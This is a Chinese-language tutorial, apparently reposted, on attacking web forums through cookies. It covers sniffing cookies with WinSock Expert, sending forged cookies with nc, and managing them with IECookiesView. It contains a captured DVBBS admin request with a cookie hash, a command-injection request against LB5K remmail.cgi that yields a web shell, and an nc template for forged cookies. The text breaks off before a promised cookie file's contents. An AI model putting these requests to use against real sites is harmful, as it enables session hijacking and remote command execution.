最近网上流行web脚本入侵。常用的入侵方法有两个,一个是Sql Injection(是个描述将SQL代码传递到一个并不被研发人员所想要的应用程式中去的专业术语),另一个就是利用web脚本中对cookie变量过滤不严来入侵。那么什么是cookie呢?简单的说就是Web页服务器用来记录您的信息, 置于您硬盘上的一个很小的文本文档。具体点说假如是98那么他们默认存放在drive:/windows/cookies目录下,假如是2k他们在drive:/Documents and Settings/%您的用户名%/Cookies目录下(每个文档都不会超过4KB)。他们的文档名格式为:您的用户名@产生的COOKIE的网页文档所在的WEB目录[COOKIE改变的次数].txt。具体的例子就像这个文档:iwam_system@cookie[3].txt。这里我只谈和cookie有关的三个入侵工具。 一个是cookie的嗅探工具。网友PsKey最近写了一篇<<动网论坛(DVBBS)存在严重漏洞>>的文章。文章大意是由www.aspsky.net研发和维护的源代码开放的DVBBS6.0论坛由于其tongji.asp文档没有过滤用户提交传递给SQL查询的输入,导致远程攻击者能够利用这个漏洞进行SQL注入攻击。在dbvvs6.o的sql版能够直接在服务器主机上添加管理员用户,在dbvvs6.o的acess版提交特别url能够得到论坛里任何用户的cookie数据,进而威胁论坛或服务器安全。原文您能够在安全焦点网站(http://www.xfocus.net)看到。 文章里有一段写到"看看管理员操作论坛时到底需要些什么,举个例子,删帖子的时候:
POST /asp/dvbbs/admin_postings.asp?action=delet HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*
Referer: http://www.target.com/asp/dvbbs/admin_postings.asp?action=删除主题&BoardID=2&ID=2
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)
Host: target.com
Content-Length: 124
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: aspsky=userhidden=2&password=18e071ccfb2d1c99&userid=1&userclass=管理员&username=admin&usercookies=0; iscookies=0; BoardList=BoardID=Show; ASPSESSIONIDAASCSCDC=IPKLMGFAKFJLMOLNMMEMFDGC; upNum=0 title=灌水&content=&doWealth=-7&douserCP=-5&douserEP=-5&id=2&replyid=&boardid=2&msg=&submit=确认操作 " 这些数据就是管理员在删贴子的时和动网主机的通讯数据。很多菜鸟看到这里就不明白了,pskey是如何得到这些数据的呢?特别是最后一大段的cookie数据是怎样探测到的?pskey用的什么工具我不得而知,但我介绍的WinSock Expert这个小工具也能够邦我们探测到这些数据。他是国人董雪强编写的一个用来监控和修改网络发送和接收数据的程式,但遗憾的却是个英文版本。但是使用方法是很简单的。举个例子,我来登陆我在本机上架设的动网论坛,图1.jpg。
我选择的是cookie保存一天,看看WinSock Expert会嗅探到什么数据呢?此时打开WinSock Expert,图2.jpg,
点打开图标在弹出窗口的菜单里找到动网的登陆页面,图3.jpg,
点ope进行监听。然后我登陆动网论坛,登陆完毕后,再看看WinSock Expert帮我在本机接收到那些cookie数据呢?图4.jpg。
看到了没有,我们接收到了和pskey在文章中提到的类似数据,里边包含了cookie的各项值。当然用这个工具,您不但能够监听发送和接收的cookie,还能够用来帮助您调试网络应用程式,分析网络程式的通信协议(如分析OICQ的发送接收数据),并且在必要的时候能够修改发送的数据。这些功能在软件的帮助里都有简单说明。 第二个是cookie的发送工具。还是先看网友pskey的一篇<<LB5K论坛remmail.cgi存在认证和过滤不严漏洞>>文章吧。原文您也能够安全焦点看到。文章提到LB是一款由www.leoboard.com研发和维护的源代码开放的cgi论坛;由于remmail.cgi存在认证和过滤不严漏洞,可能导致非法用户控制论坛或以web权限在系统上执行任意命令。攻击方法:假如对方w2k系统采用的是”perl.exe %s %s”映射方式很容易搞定,发送如下求就能够了得到一个网页shell了:
GET /perl/lb5000mx/cgi-bin/remmail.cgi?member=system @ARGV HTTP/1.1
Host: target.com
Cookie: amembernamecookie=system @ARGV
菜鸟又不明白了,这些数据我如何发送呢?一开始我也不会,还用vb编写了一个小软件来发送这些数据。后来在几个论坛上问了高手,学到了一个cookie的发送方法。工具就是用瑞士军刀nc.exe,方法是依次提交以下几行类似的数据:
nc -vv www.target.com 80
get /xxx/xxx.cgi?xxx=xxx HTTP/1.1
host:www.target.com
cookie:xxxxx=xxxxx
看我在本机做的实验,图5
这是用nc提交cookie的方法。
图6
这是得到了一个webshell。
注意的是,用w2k自带的telnet工具也能够做到,方法和nc.exe相同,但是我发现用telnet不太容易控制字符输入。 第三个cookie的管理工具,iecookiesview。看名字就明白他是用来做什么的吧。先看一下我用记事本打开刚才本机登陆动网论坛留下的cookie文档,他是放在我硬盘c:/Documents and Settings/administrator/Cookies目录下,文档名是administrator@dvbbs6[1].txt,内容如下:
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
